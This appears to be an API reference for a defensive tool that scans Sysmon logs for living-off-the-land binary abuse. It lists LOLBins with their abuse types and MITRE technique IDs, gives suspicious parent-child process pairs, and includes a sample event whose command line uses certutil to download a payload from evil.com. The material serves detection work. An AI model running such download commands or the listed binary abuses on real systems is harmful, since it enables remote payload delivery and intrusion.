Files
Anthropic-Cybersecurity-Skills/skills/detecting-living-off-the-land-attacks/references/api-reference.md
T
mukul975 c47eed6a64 Production hardening: security fixes, code quality, 724 skills complete
- Fix 25 shell=True subprocess calls with list-based commands
- Fix 49 verify=False in defensive skills (env-var override)
- Add timeout to 231 HTTP/subprocess/socket calls
- Fix 6 SQL injection patterns with whitelist validation
- Replace 8 __import__() with standard imports
- Remove 701 unused imports across 442 files
- Add authorized-testing disclaimers to all offensive skills
- Complete 11 incomplete skill directories
- Expand 10 stub SKILL.md files with full content
- Fix 2 YAML parse errors in frontmatter
- Fix 5 pre-existing syntax errors
- Convert 22 hardcoded paths/ports to environment variables
- Back up 21 redundant skill pairs to .bak
- Fix 2 global declaration errors
- 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE)
- 0 compile errors across all 724 agent.py files
2026-03-19 13:26:49 +01:00

3.1 KiB

API Reference: Detecting Living Off the Land Attacks

CLI Usage

# Analyze Sysmon EVTX file
python agent.py sysmon-events.evtx

# Analyze Sysmon JSON/JSONL export (one event per line)
python agent.py sysmon-events.jsonl

# Filter output for critical alerts
python agent.py sysmon-events.evtx 2>/dev/null | grep CRITICAL

LOLBins Detected

Binary MITRE Technique Severity Abuse Type
certutil.exe T1218, T1105, T1140 high Download, decode, encode
mshta.exe T1218.005 high Remote/inline script execution
rundll32.exe T1218.011 critical JS execution, LSASS dump, DLL loading
regsvr32.exe T1218.010 critical Squiblydoo scriptlet execution
bitsadmin.exe T1197, T1105 high BITS download, job notification
wmic.exe T1047 high Remote process creation, XSL processing
msbuild.exe T1127.001 high Inline task execution from temp/AppData
installutil.exe T1218.004 high Silent uninstall execution
cmstp.exe T1218.003 high INF-based execution
mavinject.exe T1218.013 critical DLL injection into running process
cscript.exe T1059.005 medium Remote/suspicious script execution
wscript.exe T1059.005 medium Remote/suspicious script execution

Suspicious Parent-Child Pairs Detected

Parent Process Child Process MITRE Severity
winword/excel/outlook cmd/powershell/mshta/certutil T1204.002 critical
wmiprvse.exe cmd/powershell/mshta/rundll32 T1047 critical
services.exe cmd/powershell/mshta/rundll32 T1543.003 high
svchost.exe mshta/regsvr32/msbuild/certutil T1218 high

Network-Suspicious LOLBins

LOLBins making outbound network connections are flagged as CRITICAL:

certutil.exe, mshta.exe, rundll32.exe, regsvr32.exe, msbuild.exe, installutil.exe, bitsadmin.exe, esentutl.exe, expand.exe, replace.exe, cmstp.exe

Input Formats

JSON Events Format

[
  {
    "Image": "C:\\Windows\\System32\\certutil.exe",
    "CommandLine": "certutil -urlcache -f http://evil.com/payload.exe C:\\temp\\p.exe",
    "ParentImage": "C:\\Windows\\System32\\cmd.exe",
    "User": "CORP\\jsmith",
    "UtcTime": "2026-03-19 14:32:15.000",
    "Computer": "WORKSTATION-01"
  }
]

EVTX Requirements

Sysmon EVTX files with:

  • Event ID 1 (Process Creation) with full command-line logging
  • Event ID 3 (Network Connection) for LOLBin network detection

Report Output Schema

{
  "report_date": "2026-03-19T12:00:00+00:00",
  "total_findings": 15,
  "by_severity": {"critical": 3, "high": 8, "medium": 4},
  "by_lolbin": {"certutil.exe": 5, "rundll32.exe": 3, "mshta.exe": 2},
  "mitre_techniques_observed": ["T1047", "T1105", "T1218", "T1218.005", "T1218.011"],
  "findings": []
}

References